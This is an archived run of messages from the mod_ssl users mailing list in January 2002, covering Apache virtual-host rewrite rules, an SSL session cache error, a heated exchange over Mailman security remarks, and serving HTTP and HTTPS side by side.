frustration.identityvector.net: freak owned process doing -bs Date: Sun, 6 Jan 2002 21:01:10 -0500 (EST) From: Phil Hagen X-X-Sender: To: Subject: RE: name-based vhost woes In-Reply-To: <000001c1936d$2894c000$ee03a8c0@INSPIRON3> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Phil Hagen X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Just to provide a follow-up, I was able to fix the original problem by learning some rudimentary mod_rewrite stuff as suggested by a few. Basically, this did the trick: ... RewriteEngine On RewriteCond %{HTTP_HOST} !secure.domain.dom RewriteRule ^/(.*) http://%{HTTP_HOST} ... ServerName secure.domain.dom RewriteEngine On RewriteCond %{SERVER_PORT} ^80$ RewriteRule ^/(.*) http://domain.dom Result: All https:// requests to other VHosts are redirected to their http:// counterparts, and any http:// requests to the secure VHost are sent to the unsecured main site. I'm sure there is a more effective way to meet the ALWAYS_TRUE condition done with SERVER_PORT above, but this one works for now. Hope this helps someone in a similar position out!! - -Phil Hagen On Wed, 2 Jan 2002, Rajidhar Etta wrote: > I can think of two solutions (not sure if whether both of them turns out > to be 'NOT ELIGENT' solutions) > 1. > Within the virtual host section of foo.com:443, you could do the > following: > SetEnvIfNoCase Host bar\.com bar > SetEnvIfNoCase Host bar\.org bar > (above sets two environment variable bar if the HTTP header Host field > contains bar.com OR bar.org). > Then in your section of DocumentRoot (say if it is /d1/d2 ) > > ... > ... > .. > Allow from env!=bar > Which actually blocks access to any page.... You can use > the above in Also. > > 2. Use mod_rewrite (RewriteCond which checks the HOST & RewriteRule) > inside the virtualhost to redirect to any error page. > > > > > Rajidhar Etta > eComServer, Inc > 609.951.8500 (x 192) > 609.203.3697 (Cell) - -- http://identityvector.com/~phil/ (PGP Key, software, etc) PGP key also at http://www.keyserver.net -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iEYEARECAAYFAjw5AWkACgkQ/5g75OFK7JMqcQCeK9Xlcxi8XDAetUflo87Y1ZeO qQQAn3vhYo5b/1y1G0p+8v+1K4zel2+V =Rpn5 -----END PGP SIGNATURE----- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 03:53:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA11014; Mon, 7 Jan 2002 03:52:23 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.ecomserver.com id DAA10994; Mon, 7 Jan 2002 03:51:19 +0100 (MET) Received: from INSPIRON3 ([68.38.146.162]) by mail.ecomserver.com (Netscape Messaging Server 4.15) with SMTP id GPJSGF00.M9F for ; Sun, 6 Jan 2002 22:02:39 -0500 From: "Rajidhar Etta" To: Subject: mod_ssl Cannot open SSLSessionCache DBM file Date: Sun, 6 Jan 2002 21:53:26 -0500 Organization: eComServer Inc Message-ID: <000001c19726$7b2c8070$ee03a8c0@INSPIRON3> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Rajidhar Etta" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I am getting the following errors in the last few days (they never used to come before, and configuration /Directory permissions is not changed). [httpdserror] [error] mod_ssl Cannot open SSLSessionCache DBM file [httpdserror] [error] System No such file or directory (errno 2). [httpdserror] reading (fetch) (System error follows). httpd.conf: mod_ssl part of our server is as follows, ----- SSLSessionCache dbm:/logs/Apache/logs/ssl_scache SSLSessionCacheTimeout 300 ----- we have two webservers with identical configuration and strangely only one server we are getting this error. When I checked the presense of ssl_scache.dir & ssl_scache.pag files on the server where it is giving error, they are not there. Directory permissions doesn't prevent mod_ssl to create/open a file (as I mentioned before, configuration of both server is identical). Please advise, Rajidhar Etta eComServer, Inc 609.951.8500 (x 192) 609.203.3697 (Cell) ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 05:35:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA15512; Mon, 7 Jan 2002 05:34:13 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id FAA15496; Mon, 7 Jan 2002 05:33:46 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id XAA10710 for ; Sun, 6 Jan 2002 23:43:22 -0500 Date: Sun, 6 Jan 2002 23:43:22 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman In-Reply-To: <20020106173419.N69158-100000@anger.verticalscope.com> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 6 Jan 2002, Julian C. Dunn wrote: > On Sun, 6 Jan 2002, R. DuFresne wrote: > > > I'd remove the mailman CGI scripts, they have some security issues that > > have been covered on the Bugtraq list. > > I really don't think that this is a very helpful comment because it's a > non-sequitur; first off it doesn't solve David's problem, and second of > all, you should provide some context for that statement. MailMan < 2.0.8 > suffers from cross-site-scripting security problems which have been fixed > in the latest release, if those are the security issues you are referring > to. Even so, what if David is running MailMan on an intranet where the CSS > bugs won't be exploited? Then these security issues are not relevant to > him. First, I didn't think folks on this list required spoonfeeding. I take it that folks capble of untarring and going through the farily complex instructions for installing 3 or more seperate packages are qualified to do some research on their own, which persons concerned with the security of the site they maintain certainly should do, yes? Second, I am not aware, and you certainly are not aware of which version of mailman the requestor has on his system. Third, in a private response to the requester, which I'll not post as it was indeed a private exchange and the posting of private exchanges is in bad form, right?, there was a bit more information included, to help guide them in their own search for the issues breifly related in my first public posting. Forth, you were and are certainly allowed to supply more information and spoonfeeding to requestors, should you feel it nessecary, as you did, for the edification of the full list or privately, if spoonfeeding is your forte. Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 05:40:27 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA15683; Mon, 7 Jan 2002 05:39:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id FAA15659; Mon, 7 Jan 2002 05:38:29 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id XAA10732 for ; Sun, 6 Jan 2002 23:48:06 -0500 Date: Sun, 6 Jan 2002 23:48:06 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: mod_ssl Cannot open SSLSessionCache DBM file In-Reply-To: <000001c19726$7b2c8070$ee03a8c0@INSPIRON3> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 6 Jan 2002, Rajidhar Etta wrote: > I am getting the following errors in the last few days (they never used > to come before, and configuration /Directory permissions is not > changed). > > [httpdserror] [error] mod_ssl Cannot open SSLSessionCache DBM file > [httpdserror] [error] System No such file or directory (errno 2). > [httpdserror] reading (fetch) (System error follows). > > httpd.conf: mod_ssl part of our server is as follows, > ----- > SSLSessionCache dbm:/logs/Apache/logs/ssl_scache > SSLSessionCacheTimeout 300 > ----- > we have two webservers with identical configuration and strangely only > one server we are getting this error. When I checked the presense of > ssl_scache.dir & ssl_scache.pag files on the server where it is giving > error, they are not there. Directory permissions doesn't prevent mod_ssl > to create/open a file (as I mentioned before, configuration of both > server is identical). > I could well be mistaken, but, I think you are at least missing the SSLSessionCache size parameter How identical are the two systems in question? Same steps in the install? same OS on each system? Same hardware? This might be an additional issue and information should the SSLSessionCache size parameter not fix the problem and a second request for info nees posting. Thanks, Ron DuFresne -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 05:49:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA16052; Mon, 7 Jan 2002 05:48:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from linux.midrange.com id FAA16042; Mon, 7 Jan 2002 05:48:01 +0100 (MET) Received: from dustpuppy.midrange.com (dustpuppy.midrange.com [192.168.1.10]) by linux.midrange.com (8.11.6/linuxconf) with ESMTP id g074lxm20768 for ; Sun, 6 Jan 2002 22:47:59 -0600 Message-Id: <5.1.0.14.2.20020106224534.02ac1060@linux.midrange.com> X-Sender: david@linux.midrange.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Sun, 06 Jan 2002 22:47:57 -0600 To: modssl-users@modssl.org From: David Gibbs Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman In-Reply-To: References: <20020106173419.N69158-100000@anger.verticalscope.com> Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: David Gibbs X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users At 11:43 PM 1/6/2002 -0500, you wrote: >First, I didn't think folks on this list required spoonfeeding. Folks: Mailman isn't really the issue ... I am running 2.0.8, but I think the problem lies with IE & mod_ssl ... as Netscape works fine. I've checked the FAQ's and done the requisite Google searches ... I couldn't find anything significant. Is there any debugging flags that I can turn on to get more information, perhaps I have something configured wrong. Maybe something has to be added to allow IE data to be accepted. Thanks! david ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 05:49:21 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id FAA16062; Mon, 7 Jan 2002 05:48:31 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id FAA16011; Mon, 7 Jan 2002 05:47:21 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id XAA10780 for ; Sun, 6 Jan 2002 23:56:59 -0500 Date: Sun, 6 Jan 2002 23:56:58 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I hate to reply to my own postings, but, there is a fifth I forgot to mention. Many of the CGI scripts one will find posted for free use on the net are open vulnerabilities, and many of those authors no longer maintain them. For that reason, people are far better off to learn a scripting language and the intricities of using it in a secure fashion rather then relying upon what they might find, poorly if at all maintained, on the free CGI sites. Thanks, Ron DuFresne On Sun, 6 Jan 2002, R. DuFresne wrote: > On Sun, 6 Jan 2002, Julian C. Dunn wrote: > > > On Sun, 6 Jan 2002, R. DuFresne wrote: > > > > > I'd remove the mailman CGI scripts, they have some security issues that > > > have been covered on the Bugtraq list. > > > > I really don't think that this is a very helpful comment because it's a > > non-sequitur; first off it doesn't solve David's problem, and second of > > all, you should provide some context for that statement. MailMan < 2.0.8 > > suffers from cross-site-scripting security problems which have been fixed > > in the latest release, if those are the security issues you are referring > > to. Even so, what if David is running MailMan on an intranet where the CSS > > bugs won't be exploited? Then these security issues are not relevant to > > him. > > First, I didn't think folks on this list required spoonfeeding. I take it > that folks capble of untarring and going through the farily complex > instructions for installing 3 or more seperate packages are qualified to > do some research on their own, which persons concerned with the security > of the site they maintain certainly should do, yes? Second, I am not > aware, and you certainly are not aware of which version of mailman the > requestor has on his system. Third, in a private response to the > requester, which I'll not post as it was indeed a private exchange and > the posting of private exchanges is in bad form, right?, there was a bit > more information included, to help guide them in their own search for the > issues breifly related in my first public posting. Forth, you were and > are certainly allowed to supply more information and spoonfeeding to > requestors, should you feel it nessecary, as you did, for the edification > of the full list or privately, if spoonfeeding is your forte. > > Thanks, > > > Ron DuFresne > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 14:44:18 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id OAA15948; Mon, 7 Jan 2002 14:43:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from anger.verticalscope.com id OAA15867; Mon, 7 Jan 2002 14:41:51 +0100 (MET) Received: by anger.verticalscope.com (Postfix, from userid 1027) id 9BBCB7DE4; Mon, 7 Jan 2002 08:42:05 -0500 (EST) Received: from localhost (localhost [127.0.0.1]) by anger.verticalscope.com (Postfix) with ESMTP id 9963B3EA4 for ; Mon, 7 Jan 2002 08:42:05 -0500 (EST) Date: Mon, 7 Jan 2002 08:42:05 -0500 (EST) From: "Julian C. Dunn" To: Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman In-Reply-To: Message-ID: <20020107083756.D80088-100000@anger.verticalscope.com> MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On Sun, 6 Jan 2002, R. DuFresne wrote: > I hate to reply to my own postings, but, there is a fifth of course> I forgot to mention. Many of the CGI scripts one will find > posted for free use on the net are open vulnerabilities, and many of those > authors no longer maintain them. For that reason, people are far better > off to learn a scripting language and the intricities of using it in a > secure fashion rather then relying upon what they might find, poorly if at > all maintained, on the free CGI sites. What this has to do with the original poster's problem -- heck, what ANY of your post has to do with the original poster's problem, or mod-ssl, is totally beyond me. It looks like you are using this opportunity to go off on a completely unrelated tangent about security problems and/or cross-site-scripting vulnerabilities, when the likelihood of the original poster's problem being attributed to these problems is extremely minimal. Unless you have something to contribute in the mod-ssl context I suggest you confine your security-related comments to an appropriate forum. - Julian ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 15:28:34 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA18310; Mon, 7 Jan 2002 15:27:19 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id PAA18297; Mon, 7 Jan 2002 15:26:47 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id JAA12992 for ; Mon, 7 Jan 2002 09:36:26 -0500 Date: Mon, 7 Jan 2002 09:36:26 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: Re: mod_ssl, apache, cgi-bin, IE 5.5, & Mailman In-Reply-To: <20020107083756.D80088-100000@anger.verticalscope.com> Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users as much help as you've offered the requestor eh? My suggestion, send yer flamse to /dev/null, it'll pay you more attention. Thanks, Ron DuFresne On Mon, 7 Jan 2002, Julian C. Dunn wrote: > On Sun, 6 Jan 2002, R. DuFresne wrote: > > > I hate to reply to my own postings, but, there is a fifth > of course> I forgot to mention. Many of the CGI scripts one will find > > posted for free use on the net are open vulnerabilities, and many of those > > authors no longer maintain them. For that reason, people are far better > > off to learn a scripting language and the intricities of using it in a > > secure fashion rather then relying upon what they might find, poorly if at > > all maintained, on the free CGI sites. > > What this has to do with the original poster's problem -- heck, what ANY > of your post has to do with the original poster's problem, or mod-ssl, is > totally beyond me. It looks like you are using this opportunity to go off > on a completely unrelated tangent about security problems and/or > cross-site-scripting vulnerabilities, when the likelihood of the original > poster's problem being attributed to these problems is extremely minimal. > > Unless you have something to contribute in the mod-ssl context I suggest > you confine your security-related comments to an appropriate forum. > > - Julian > > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org > -- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ admin & senior consultant: sysinfo.com http://sysinfo.com "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart testing, only testing, and damn good at it too! ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 17:17:24 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA23658; Mon, 7 Jan 2002 17:16:35 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id RAA23630; Mon, 7 Jan 2002 17:15:40 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from localhost id QAA25299; Thu, 3 Jan 2002 16:44:07 +0100 (MET) Date: Thu, 3 Jan 2002 16:44:07 +0100 (MET) Message-Id: <200201031544.QAA25299@opensource.ee.ethz.ch> From: modssl-bugdb@modssl.org To: modssl-users@modssl.org Subject: Re: [BugDB] Intermittent "Cannot find server or DNS error" and "Page cann (PR#656) CC: modssl-bugdb@modssl.org X-Loop: modssl-bugdb@modssl.org Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: modssl-bugdb@modssl.org X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users How do I close out a bug report? After receiving no response on my bug report for some time, I pursued the issue with Oracle Worldwide Support, since they package the Apache Web Server and mod_ssl with their Oracle9i Application Server. I found a working solution and would like reply to the bug report I submitted and provide our resolution details. The bug report also needs to be closed out. I tried to do it myself, but it said I could not as a "guest" user. I do not have any type of bug report login account. I REALLY need to get the resolution posted so that I can reduce the number of emails I am getting from other people seeing the bug report and emailing me for more details and my resolution. PLEASE HELP! Carol Kuczborski EDS - Enabling Business Solutions MS A6N-B47 13600 EDS Drive Herndon, VA 20171 * phone: +01-703-742-1025 (8-432) * mailto:carol.kuczborski@eds.com www.eds.com -----Original Message----- From: modssl-bugdb@modssl.org [mailto:modssl-bugdb@modssl.org] Sent: Monday, August 06, 2001 11:57 AM To: carol.kuczborski@eds.com Subject: Re: Intermittent "Cannot find server or DNS error" and "Page cannot be displayed" with IE 5.5 (PR#596) Thanks for submitting your feedback to the mod_ssl project. Your message was recognized and filed to the mod_ssl Bug Database (see http://www.engelschall.com/sw/mod_ssl/bugdb/) under the problem report PR#596 ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 17:17:28 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA23668; Mon, 7 Jan 2002 17:16:46 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users@modssl.org id RAA23641; Mon, 7 Jan 2002 17:15:46 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from newman.gardnerbender.com id RAA27589; Thu, 3 Jan 2002 17:29:45 +0100 (MET) Received: from conversion-daemon.newman.gardnerbender.com by newman.gardnerbender.com (iPlanet Messaging Server 5.1 (built May 7 2001)) id <0GPD00D01E4EC5@newman.gardnerbender.com> for modssl-users@modssl.org; Thu, 03 Jan 2002 10:26:58 -0600 (CST) Received: from 00b0d04bcbeb ([65.171.100.30]) by newman.gardnerbender.com (iPlanet Messaging Server 5.1 (built May 7 2001)) with SMTP id <0GPD00D11F0YCU@newman.gardnerbender.com> for modssl-users@modssl.org; Thu, 03 Jan 2002 10:26:58 -0600 (CST) Date: Thu, 03 Jan 2002 10:30:34 -0600 From: Waleed Hamad Subject: Using https and http at the same time To: modssl-users@modssl.org Message-id: <001a01c19473$f80324b0$5c0010ac@gardnerbender.com> MIME-version: 1.0 X-MIMEOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Content-type: multipart/alternative; boundary="Boundary_(ID_P/Yhqi+2bjNurJheqdPiWQ)" Importance: Normal X-Priority: 3 (Normal) X-MSMail-priority: Normal Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Waleed Hamad X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users This is a multi-part message in MIME format. --Boundary_(ID_P/Yhqi+2bjNurJheqdPiWQ) Content-type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 7BIT Hi Is it possible to run http and https at the same time?? I mean, You know how hotmail.com works?? you login at http and then you have the choice to be secure and use https?? Please let me know Waleed --Boundary_(ID_P/Yhqi+2bjNurJheqdPiWQ) Content-type: text/html; charset=iso-8859-1 Content-Transfer-Encoding: 7BIT
 
Hi Is it possible to run http and https at the same time??
 
 I mean, You know how hotmail.com works?? you login at http and then you have the choice to be secure and use https??
 
 Please let me know
 
 Waleed
 
--Boundary_(ID_P/Yhqi+2bjNurJheqdPiWQ)-- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 17:33:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA24540; Mon, 7 Jan 2002 17:28:21 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from linux.midrange.com id RAA24297; Mon, 7 Jan 2002 17:26:56 +0100 (MET) Received: from midrange.com (localhost [127.0.0.1]) by linux.midrange.com (8.11.6/linuxconf) with SMTP id g07GQsm22200 for ; Mon, 7 Jan 2002 10:26:54 -0600 Received: from 208.248.38.130 (SquirrelMail authenticated user david) by webmail.midrange.com with HTTP; Mon, 7 Jan 2002 10:26:54 -0600 (CST) Message-ID: <23911.208.248.38.130.1010420814.squirrel@webmail.midrange.com> Date: Mon, 7 Jan 2002 10:26:54 -0600 (CST) Subject: Re: Using https and http at the same time From: "David Gibbs" To: Importance: Normal X-MSMail-Priority: Normal X-Priority: 3 In-Reply-To: <001a01c19473$f80324b0$5c0010ac@gardnerbender.com> References: <001a01c19473$f80324b0$5c0010ac@gardnerbender.com> X-Mailer: SquirrelMail (version 1.2.2) MIME-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "David Gibbs" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Waleed Hamad said: > Hi Is it possible to run http and https at the same time?? As long as pages in your website only uses relative references there should be no reason you can't. I setup a webmail server that does exactly that ... it works the same in http as with https. 'course, this is nothing specific to mod_ssl ... the same should apply to any SSL implementation. david ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 17:36:17 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA25076; Mon, 7 Jan 2002 17:33:36 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from chrome.verticalscope.com id RAA24969; Mon, 7 Jan 2002 17:32:11 +0100 (MET) Received: from jedi.verticalscope.com (dhcp116.office.verticalscope.com [10.10.10.116]) by chrome.verticalscope.com (Postfix) with ESMTP id 67FBCCCA6D for ; Mon, 7 Jan 2002 11:35:43 -0500 (EST) Received: by jedi.verticalscope.com (Postfix, from userid 533) id C9C9F19DB; Mon, 7 Jan 2002 11:31:59 -0500 (EST) Message-ID: X-Mailer: XFMail 1.5.0 on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 8bit MIME-Version: 1.0 In-Reply-To: <001a01c19473$f80324b0$5c0010ac@gardnerbender.com> X-Base: are belong to us. move zig for great justice. Date: Mon, 07 Jan 2002 11:31:59 -0500 (EST) X-Face: %*.F!K#`0&;M^0AiDH.>-twy^j2[V{11:%R@6A~sj26H$^}7B[ez9tB`&D'j-?}eX%;o|YO zn1jl&;})pyN.}i.gv~S>>u%=={3PJMI3.pcaQ0l#E.S0(xHJKhmW#]CMP}ue"&PsW=q&Tl8C&g)AT ;<9dD2"Z|$El To: modssl-users@modssl.org Subject: RE: Using https and http at the same time Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Julian C. Dunn" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users On 03-Jan-2002 Waleed Hamad wrote: > Hi Is it possible to run http and https at the same time?? > > I mean, You know how hotmail.com works?? you login at http and then you > have the choice to be secure and use https?? I don't know how Hotmail works, but I deduce from your question that you want to access the same pages via SSL and non-SSL. In that case, just set the DocumentRoot for both the SSL and non-SSL site to be the same directory. regards, Julian -- Julian C. Dunn, B.A.Sc. Senior Software Developer, VerticalScope Inc. 111 Peter St., Suite 700, Toronto, ON Tel: (416) 341-8950 x236 Fax: (416) 341-8959 istream >> ostream >> "We all scream for ice cream"; ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Mon Jan 7 18:07:23 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA27706; Mon, 7 Jan 2002 18:04:43 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from darkstar.sysinfo.com id SAA27376; Mon, 7 Jan 2002 18:02:51 +0100 (MET) Received: from localhost (dufresne@localhost) by darkstar.sysinfo.com (8.9.1/8.9.1) with ESMTP id MAA13572 for ; Mon, 7 Jan 2002 12:12:25 -0500 Date: Mon, 7 Jan 2002 12:12:25 -0500 (EST) From: "R. DuFresne" To: modssl-users@modssl.org Subject: RE: Using https and http at the same time In-Reply-To: Message-ID: Organization: sysinfo.com X-Subliminal: If at first you don't suck seed... MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "R. DuFresne" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users I may be reading the requester wrong, but, my impression of his question is: someone access' the server via http, and then they wish to reaccess the server via https, add the sockets layer once they have already connected in a 'normal' http session. And this is only slightly different then how others have already interpreted and answered the question. Yes this can be done, you could put a tag on your main server page that allows the user to 'reconnect' with https rather then plain old vanilla http. I leave the tagging issues for the user to figure out, well, not really: secure ssl connection Perhaps this is what the requestor is asking about, perhaps the previous list readers answered the question in simpler terms. Thanks, Ron DuFresne On Mon, 7 Jan 2002, Julian C. Dunn wrote: > On 03-Jan-2002 Waleed Hamad wrote: > > > Hi Is it possible to run http and https at the same time?? > > > > I mean, You know how hotmail.com works?? you login at http and then you > > have the choice to be secure and use https?? > > I don't know how Hotmail works, but I deduce from your question that you want > to access the same pages via SSL and non-SSL. In that case, just set the > DocumentRoot for both the SSL and non-SSL site to be the same directory. > > regards, > Julian > > -- 